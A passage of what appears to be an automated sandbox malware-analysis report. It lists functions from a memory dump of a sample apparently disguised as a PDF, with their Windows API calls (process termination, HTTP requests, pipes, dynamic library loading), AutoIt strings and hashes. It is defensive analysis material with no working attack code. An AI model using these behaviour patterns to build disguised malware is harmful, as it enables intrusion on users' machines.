                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B00401
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: 517ca263281c53b5cd76e9ce5941c5d4189d80b806d2477d0c36f1bf6c04b451
                                                                          • Instruction ID: ff4cedb1693c875f1a013169fe2dec4a48fc6155a1e19358d6e329776e9987ff
                                                                          • Opcode Fuzzy Hash: 517ca263281c53b5cd76e9ce5941c5d4189d80b806d2477d0c36f1bf6c04b451
                                                                          • Instruction Fuzzy Hash: 3E016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A864CBE5
                                                                          Function 00B4568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B4569B
                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B456B1
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00B456C0
                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B456CF
                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B456D9
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B456E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 839392675-0
                                                                          • Opcode ID: 5650ad6f6cd7c755f8c0bf028e9a44cf6ce20cb531c20c2dd5312dc4d320ca95
                                                                          • Instruction ID: 414e3891e124c2dcebdd22455ef94b2be46caf95dfff19e51f03648cdc339fc3
                                                                          • Opcode Fuzzy Hash: 5650ad6f6cd7c755f8c0bf028e9a44cf6ce20cb531c20c2dd5312dc4d320ca95
                                                                          • Instruction Fuzzy Hash: 20F01D3224155ABBE7215BA2EC0DEBB7A7CEBC7B51F000169FA04D20919AE91A01C6B5
                                                                          Function 00B474D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00B474E5
                                                                          • EnterCriticalSection.KERNEL32(?,?,00AF1044,?,?), ref: 00B474F6
                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00AF1044,?,?), ref: 00B47503
                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AF1044,?,?), ref: 00B47510
                                                                            • Part of subcall function 00B46ED7: CloseHandle.KERNEL32(00000000,?,00B4751D,?,00AF1044,?,?), ref: 00B46EE1
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B47523
                                                                          • LeaveCriticalSection.KERNEL32(?,?,00AF1044,?,?), ref: 00B4752A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3495660284-0
                                                                          • Opcode ID: 36380af025cf90736b0197be00d42c6664bb98cefdc1ed7b02c4f98e18a067de
                                                                          • Instruction ID: e45742552b8170f26015bfaca98c85827c40262993935010d84e829a77c4c7dc
                                                                          • Opcode Fuzzy Hash: 36380af025cf90736b0197be00d42c6664bb98cefdc1ed7b02c4f98e18a067de
                                                                          • Instruction Fuzzy Hash: 71F03A3A184613ABDB112B64FC989EA776AFF45302B000571F202A60E0CFB95901DE50
                                                                          Function 00B38E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B38E7F
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00B38E8B
                                                                          • CloseHandle.KERNEL32(?), ref: 00B38E94
                                                                          • CloseHandle.KERNEL32(?), ref: 00B38E9C
                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00B38EA5
                                                                          • HeapFree.KERNEL32(00000000), ref: 00B38EAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                          • String ID:
                                                                          • API String ID: 146765662-0
                                                                          • Opcode ID: bfe19bd48bbae22b9b19d0ef5651086657162256bd9caa8a02ed807c39cd1e8b
                                                                          • Instruction ID: a60ee33ee980f88e76009cce13fc4a0b19a4efabfa0329e68f67ceacbe9d9318
                                                                          • Opcode Fuzzy Hash: bfe19bd48bbae22b9b19d0ef5651086657162256bd9caa8a02ed807c39cd1e8b
                                                                          • Instruction Fuzzy Hash: 28E0C236004002FBDA011FE1FC0C92ABB69FB8A362B108230F229921B0CFBA9420DB50
                                                                          Function 00B58902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00B58928
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00B58A37
                                                                          • VariantClear.OLEAUT32(?), ref: 00B58BAF
                                                                            • Part of subcall function 00B47804: VariantInit.OLEAUT32(00000000), ref: 00B47844
                                                                            • Part of subcall function 00B47804: VariantCopy.OLEAUT32(00000000,?), ref: 00B4784D
                                                                            • Part of subcall function 00B47804: VariantClear.OLEAUT32(00000000), ref: 00B47859
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                          • API String ID: 4237274167-1221869570
                                                                          • Opcode ID: 38323d7e1c266134f72fdf80dd73617ff54b1454fd329b5ee8053320d2176a71
                                                                          • Instruction ID: d7ac0d8a3a7de9126755d73319bcc9e129ec0fa91666bb92b302c5dca5909c0c
                                                                          • Opcode Fuzzy Hash: 38323d7e1c266134f72fdf80dd73617ff54b1454fd329b5ee8053320d2176a71
                                                                          • Instruction Fuzzy Hash: 8C919F71608341DFC700DF25C584A6BBBE4EF88355F1449AEF88A9B362DB31E909CB52
                                                                          Function 00B42F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AFFEC6: _wcscpy.LIBCMT ref: 00AFFEE9
                                                                          • _memset.LIBCMT ref: 00B43077
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B430A6
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B43159
                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B43187
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 4152858687-4108050209
                                                                          • Opcode ID: 850862ca8997e1c09cb514f0a76489c25f05043499362a117857d3ae1c236f8b
                                                                          • Instruction ID: 387458985d4b54453d5ba32eac353bf471625a13e5ba4e4de78561f7548988ee
                                                                          • Opcode Fuzzy Hash: 850862ca8997e1c09cb514f0a76489c25f05043499362a117857d3ae1c236f8b
                                                                          • Instruction Fuzzy Hash: A751E1716083009AD7159F28D845B6BBBE8EF55B20F080AAEF895E32D0DB74CF44E752
                                                                          Function 00B3DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B3DAC5
                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B3DAFB
                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B3DB0C
                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B3DB8E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                          • String ID: DllGetClassObject
                                                                          • API String ID: 753597075-1075368562
                                                                          • Opcode ID: ec9082dfa0ee425150dfef1e222d95c18613cbb9642b286471704e08b0087d39
                                                                          • Instruction ID: 694890c346971b5ad84e53875edd2f9e66751e790753c1cea28f98dfed08b712
                                                                          • Opcode Fuzzy Hash: ec9082dfa0ee425150dfef1e222d95c18613cbb9642b286471704e08b0087d39
                                                                          • Instruction Fuzzy Hash: 8F417171600208EFDF15CF54E884A9ABBE9EF48350F2580E9ED059F255E7B1DA44CBA0
                                                                          Function 00B42C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B42CAF
                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B42CCB
                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00B42D11
                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BA6890,00000000), ref: 00B42D5A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1173514356-4108050209
                                                                          • Opcode ID: 5888acecf46db86ce24dbf2761150a2621e447bad6d5b6d94e5cdef6f79a5b48
                                                                          • Instruction ID: eb325c61fbd3b0ae531568d3209b618326d36afcd0d8c8003ee5d21ed921cbbc
                                                                          • Opcode Fuzzy Hash: 5888acecf46db86ce24dbf2761150a2621e447bad6d5b6d94e5cdef6f79a5b48
                                                                          • Instruction Fuzzy Hash: F741A3705043029FDB10DF24DC85B1AB7E4EF85324F5446ADF966972D1DB70EA04EB92
                                                                          Function 00B5DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B5DAD9
                                                                            • Part of subcall function 00AE79AB: _memmove.LIBCMT ref: 00AE79F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower_memmove
                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                          • API String ID: 3425801089-567219261
                                                                          • Opcode ID: 65d1ddc9789ab44cd91342bcf0d7075767f6203e2a033c6c09bb51661aee0626
                                                                          • Instruction ID: 21d8e8ca3c3b95c7f377fff0a27016f41529c479432b0f30e604cb4060c5c21a
                                                                          • Opcode Fuzzy Hash: 65d1ddc9789ab44cd91342bcf0d7075767f6203e2a033c6c09bb51661aee0626
                                                                          • Instruction Fuzzy Hash: 3531A17190421AABCF10EF64CD81AAEB7F5FF15310F1087A9E865976D1CB71A909CB90
                                                                          Function 00B39372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B393F6
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B39409
                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B39439
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 365058703-1403004172
                                                                          • Opcode ID: f41aff6c951b33c0278044def442ef4f61d1170164e8277bfaa0198df2a87fdc
                                                                          • Instruction ID: d0e13a275eb2e43b5ff0b9bd6c0254cddbee0f68d988972b96647054a67e7069
                                                                          • Opcode Fuzzy Hash: f41aff6c951b33c0278044def442ef4f61d1170164e8277bfaa0198df2a87fdc
                                                                          • Instruction Fuzzy Hash: C221B171904104BADB28AB75DC85CFFB7A8DF45360F2041A9F926972E1DBB94E0A9620
                                                                          Function 00B51B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B51B40
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B51B66
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B51B96
                                                                          • InternetCloseHandle.WININET(00000000), ref: 00B51BDD
                                                                            • Part of subcall function 00B52777: GetLastError.KERNEL32(?,?,00B51B0B,00000000,00000000,00000001), ref: 00B5278C
                                                                            • Part of subcall function 00B52777: SetEvent.KERNEL32(?,?,00B51B0B,00000000,00000000,00000001), ref: 00B527A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                          • String ID:
                                                                          • API String ID: 3113390036-3916222277
                                                                          • Opcode ID: fdabef68c7b9660d2f9d10b136b3df20b074a8fdd397d08d9e13c8d6ffdc144c
                                                                          • Instruction ID: 11837403e21247b366bff5038e7933658333a944a160fa964306ac7ba924e693
                                                                          • Opcode Fuzzy Hash: fdabef68c7b9660d2f9d10b136b3df20b074a8fdd397d08d9e13c8d6ffdc144c
                                                                          • Instruction Fuzzy Hash: 2E21BEB1500209BFEB119F289CC5FBB77ECEB4974AF1005EAF905A7240EA649D089761
                                                                          Function 00B66656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AE1D73
                                                                            • Part of subcall function 00AE1D35: GetStockObject.GDI32(00000011), ref: 00AE1D87
                                                                            • Part of subcall function 00AE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE1D91
                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B666D0
                                                                          • LoadLibraryW.KERNEL32(?), ref: 00B666D7
                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B666EC
                                                                          • DestroyWindow.USER32(?), ref: 00B666F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 4146253029-1011021900
                                                                          • Opcode ID: 08ba6a998a96465365f09b250ef2ebf5506fb336186588103ccbf016bd42d694
                                                                          • Instruction ID: 3b6437d2b6022df26a1e712c451f2e9d689d439a6d7b86be537003df8483fcbc
                                                                          • Opcode Fuzzy Hash: 08ba6a998a96465365f09b250ef2ebf5506fb336186588103ccbf016bd42d694
                                                                          • Instruction Fuzzy Hash: DD216AB1600206ABEF104F64EC81EFB77EDEB59368F104669FA11931A0DBB9DC519760
                                                                          Function 00B4703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00B4705E
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B47091
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00B470A3
                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B470DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: dbf56367c000ddac8b3fc686775ee6e8b0e569a035069d7e6d6f50187b6fff1a
                                                                          • Instruction ID: a3b734090e98891a498dc30cec303d0cd25346353e379bf40c1d6b43cbe511d5
                                                                          • Opcode Fuzzy Hash: dbf56367c000ddac8b3fc686775ee6e8b0e569a035069d7e6d6f50187b6fff1a
                                                                          • Instruction Fuzzy Hash: 3221817454520AABDF209F78DC05A9A77E8FF45720F204AA9FCA0D73D0DBB09A40DB51
                                                                          Function 00B4710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00B4712B
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B4715D
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00B4716E
                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B471A8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: d4c8018f9d968666574bdefa0d0cdd8dc805a3399157393c670fab7fc03ddb46
                                                                          • Instruction ID: a7df1dbf79c6c7ef89e76c0bb35a75470dc82e945c2c0a3c04fe8e5906049a20
                                                                          • Opcode Fuzzy Hash: d4c8018f9d968666574bdefa0d0cdd8dc805a3399157393c670fab7fc03ddb46
                                                                          • Instruction Fuzzy Hash: 2021C5755843069BDF209F689C44AAAB7E8EF55730F200A99FCB0E32D0DF709A41DB51
                                                                          Function 00B4AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                          Download Yara Rule
